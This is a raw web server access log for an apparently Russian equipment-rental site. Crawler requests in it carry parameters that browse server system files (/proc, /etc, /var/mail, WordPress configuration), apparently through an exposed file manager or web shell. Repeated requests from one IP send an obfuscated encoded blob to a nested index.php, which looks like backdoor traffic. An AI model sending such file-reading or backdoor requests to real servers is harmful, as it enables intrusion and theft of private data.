212.16.195.25 - - [04/Nov/2025:04:02:56 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363537362p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139323937362q3232386639336631643733373563633334356131373533336362343733336561222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:05:50 +1000] "GET /shopdetail/1600177520.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:05:53 +1000] "GET /shopdetail/1600903920.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:05:56 +1000] "GET /599983568?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fisdnezmf.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 39508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:05:57 +1000] "GET /1218448?path=//etc/rpm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:05:59 +1000] "GET /599819200?path=%2Fhome%2Fregion-gk.ru%2Fdata HTTP/1.0" 200 28013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:06:01 +1000] "GET /1553536?fileloc=//var/mail/orient_auto__usr&path=//var/mail HTTP/1.0" 200 12319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:06:02 +1000] "GET /shopdetail/1600447328.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:06:06 +1000] "GET /shopdetail/1600373584.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:06:10 +1000] "GET /shopdetail/1600319312.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:06:10 +1000] "GET /1124576?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:06:14 +1000] "GET /shopdetail/1600358480.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:06:16 +1000] "GET /1180928?path=//usr/src HTTP/1.0" 200 15327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:06:19 +1000] "GET /shopdetail/1600654112.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:06:23 +1000] "GET /shopdetail/1600807760.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:06:26 +1000] "GET /1045072?path=//etc/opt HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
198.244.183.199 - - [04/Nov/2025:04:06:25 +1000] "GET /951930848?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-settings.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 46027 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.76.164 - - [04/Nov/2025:04:06:06 +1000] "GET /catalog/is-hit/arenda-krana-manipulyatora-kmu-novus/?fileloc=//bin/gettext.sh&path=//bin HTTP/1.0" 200 183309 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:06:26 +1000] "GET /shopdetail/1600221488.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:03:20 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363630302p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333030302q3936373233316239353936396162343338666663613934353133333131373736222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
74.7.227.14 - - [04/Nov/2025:04:06:38 +1000] "GET /1136960?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:06:38 +1000] "GET /shopdetail/1600268464.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:06:42 +1000] "GET /1266368?path=//var/run HTTP/1.0" 200 74347 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:06:42 +1000] "GET /shopdetail/1600297568.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:06:46 +1000] "GET /shopdetail/1600191776.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:04:06:49 +1000] "GET /news/uchastie-v-vystake-transrussia?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/wp-comments-post.php?shopdetail/2988560.html HTTP/1.0" 200 230400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:04:06:55 +1000] "GET /shopdetail/1600145312.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:04:08 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363634382p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333034382q3137656162626365643534656538373566306561343737623834396566396639222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:07:04 +1000] "GET /shopdetail/1600856944.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:06:50 +1000] "GET /1174480?path=//etc/ssl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:06 +1000] "GET /shopdetail/1600507360.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:07:10 +1000] "GET /shopdetail/1600846048.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:07:12 +1000] "GET /1474704?path=//etc/lvm HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:14 +1000] "GET /shopdetail/1600644944.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:07:18 +1000] "GET /shopdetail/1600811968.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:07:21 +1000] "GET /1439904?path=//var/tmp HTTP/1.0" 200 14121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:22 +1000] "GET /shopdetail/1600326272.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.72 - - [04/Nov/2025:04:07:24 +1000] "GET /16109328?shopdetail=0016091180 HTTP/1.0" 200 191865 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [04/Nov/2025:04:07:26 +1000] "GET /shopdetail/1600844432.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:04:34 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363637342p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333037342q3164326233363335306632653436396433306539646164666631316430613533222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:07:30 +1000] "GET /shopdetail/1600840832.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:07:32 +1000] "GET /1081200?path=//opt/zend HTTP/1.0" 200 28837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:34 +1000] "GET /shopdetail/1600313376.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:07:37 +1000] "GET /1021120?path=//usr/bin HTTP/1.0" 200 1419381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:38 +1000] "GET /shopdetail/1600516048.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:07:42 +1000] "GET /catalog/traly/specpricep-9942l5?fileloc=%2F%2F.autorelabel&path=%2F HTTP/1.0" 200 12240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:07:44 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F819%2Fstat&path=%2F%2Fproc%2F819 HTTP/1.0" 200 12524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:07:45 +1000] "GET /1228752?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:47 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F371%2Fmountinfo&path=%2F%2Fproc%2F371 HTTP/1.0" 200 15170 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:04:58 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363639382p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333039382q6337643130313934333739343132323464323632323937626434653163393565222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:07:50 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F611%2Fgid_map&path=%2F%2Fproc%2F611 HTTP/1.0" 200 12344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:07:52 +1000] "GET /1365616?path=//var/nis HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:07:53 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F1263%2Fauxv&path=%2F%2Fproc%2F1263 HTTP/1.0" 200 12311 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:07:59 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F1257%2Fio&path=%2F%2Fproc%2F1257 HTTP/1.0" 200 12309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:02 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F611%2Fwchan&path=%2F%2Fproc%2F611 HTTP/1.0" 200 12316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:08:03 +1000] "GET /1417680?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:08:05 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F8%2Fsched&path=%2F%2Fproc%2F8 HTTP/1.0" 200 13232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:08 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F24%2Fmountstats&path=%2F%2Fproc%2F24 HTTP/1.0" 200 12311 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.75.70 - - [04/Nov/2025:04:08:10 +1000] "GET /?1758216576?shopdetail=1756144055 HTTP/1.0" 200 197247 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:08:11 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fbin%2Fgprof&path=%2F%2Fbin HTTP/1.0" 200 158093 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:05:21 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363732312p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333132312q3562373432363033633361373366356137343838333037346364313431353032222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:08:14 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fproc%2F371%2Fmem&path=%2F%2Fproc%2F371 HTTP/1.0" 200 12307 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.76.164 - - [04/Nov/2025:04:08:13 +1000] "GET /catalog/inertnye-materialy/otsev/ HTTP/1.0" 200 190773 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.14 - - [04/Nov/2025:04:08:16 +1000] "GET /1190288?path=//sys/bus HTTP/1.0" 200 53163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:08:17 +1000] "GET /shopdetail/1600890016.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:21 +1000] "GET /shopdetail/1600343872.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:08:23 +1000] "GET /1081200?fileloc=//opt/zend/ioncube_loader_lin_7.1.so&path=//opt/zend HTTP/1.0" 200 2174346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:08:25 +1000] "GET /shopdetail/1600312016.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:29 +1000] "GET /shopdetail/1600594880.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:08:32 +1000] "GET /1431936?path=//etc/pear HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:08:33 +1000] "GET /shopdetail/1600796576.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [04/Nov/2025:04:05:44 +1000] "GET /images/images/images/images/images/index.php?ARRAY=7o2230223n313736323139363734342p2231223n22687474703n5p2s5p2s7n7336313076313361732r61736o69747564652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736323139333134342q3330326561643833303431313736383465663831343135373733376139323162222p2232223n223835336636373139356431633735643436633134363261346562656462623765222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35362q36362q37362q38372q3235227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [04/Nov/2025:04:08:37 +1000] "GET /shopdetail/1600328768.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:08:38 +1000] "GET /1144928?path=//etc/egl HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.141.79 - - [04/Nov/2025:04:08:39 +1000] "GET /2439058272?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-content HTTP/1.0" 200 26562 "https://region-logist.ru/2439058272?shopdetail=2436182873" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [04/Nov/2025:04:08:41 +1000] "GET /shopdetail/1600280848.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.244.131 - - [04/Nov/2025:04:08:45 +1000] "GET /952149488?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-includes HTTP/1.0" 200 458675 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.75.70 - - [04/Nov/2025:04:08:45 +1000] "GET /catalog/is-hit/arenda-krana-manipulyatora-kmu-novus/?fileloc=//lib/firmware/rt2561s.bin&path=//lib/firmware HTTP/1.0" 200 190566 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
216.73.216.53 - - [04/Nov/2025:04:08:45 +1000] "GET /shopdetail/1600590672.html HTTP/1.0" 200 62019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:08:48 +1000] "GET /1021120?fileloc=//usr/bin/pldd&path=//usr/bin HTTP/1.0" 200 31663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:08:48 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp73%2Fmods-available%2Fgettext.ini&path=%2F%2Fopt%2Fphp73%2Fmods-available HTTP/1.0" 200 12415 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frsi%2Frs9116_wlan_bt_classic.rps&path=%2F%2Flib%2Ffirmware%2Frsi HTTP/1.0" 200 476254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:53 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FSHA384_Init.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:08:55 +1000] "GET /1309136?path=//var/adm HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [04/Nov/2025:04:08:56 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FTest.3pm.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 28394 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:08:59 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin%2Foptions-general.php&path=%2Fhome%2Ftemp%2Fregion%2Fnew.region-gk.ru%2Fwp-admin HTTP/1.0" 200 35557 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [04/Nov/2025:04:09:02 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_PKEY_CTX_get_cb.3ssl.gz&path=%2F%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.0" 200 18969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [04/Nov/2025:04:09:03 +1000] "GET /1178176?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
